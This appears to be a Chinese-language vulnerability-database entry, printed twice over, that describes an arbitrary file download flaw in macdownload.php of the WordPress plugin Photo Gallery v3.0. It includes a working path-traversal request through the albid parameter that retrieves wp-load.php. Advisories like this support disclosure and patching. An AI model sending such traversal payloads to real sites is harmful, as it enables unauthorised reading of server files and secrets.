VULHUB ™

### 漏洞名称：Wordpress Plugin Photo Gallery v3.0 - 任意文件下载 ### 漏洞类型：任意文件下载 ### 漏洞影响：Photo Gallery v3.0 ### 漏洞存在url: http://localhost/[PLUGIN_PATH]/macdownload.php ### 漏洞详情： http://localhost/[PLUGIN_PATH]/macdownload.php 漏洞在macdownload.php文件 使用参数albid进行文件的下载，未进行任何防御，导致任意文件下载漏洞。 ### 漏洞利用 1、下载wp-load.php文件 http://localhost/[PLUGIN_PATH]/macdownload.php?albid=../../../wp-load.php

### 漏洞名称：Wordpress Plugin Photo Gallery v3.0 - 任意文件下载 ### 漏洞类型：任意文件下载 ### 漏洞影响：Photo Gallery v3.0 ### 漏洞存在url: http://localhost/[PLUGIN_PATH]/macdownload.php ### 漏洞详情： http://localhost/[PLUGIN_PATH]/macdownload.php 漏洞在macdownload.php文件 使用参数albid进行文件的下载，未进行任何防御，导致任意文件下载漏洞。 ### 漏洞利用 1、下载wp-load.php文件 http://localhost/[PLUGIN_PATH]/macdownload.php?albid=../../../wp-load.php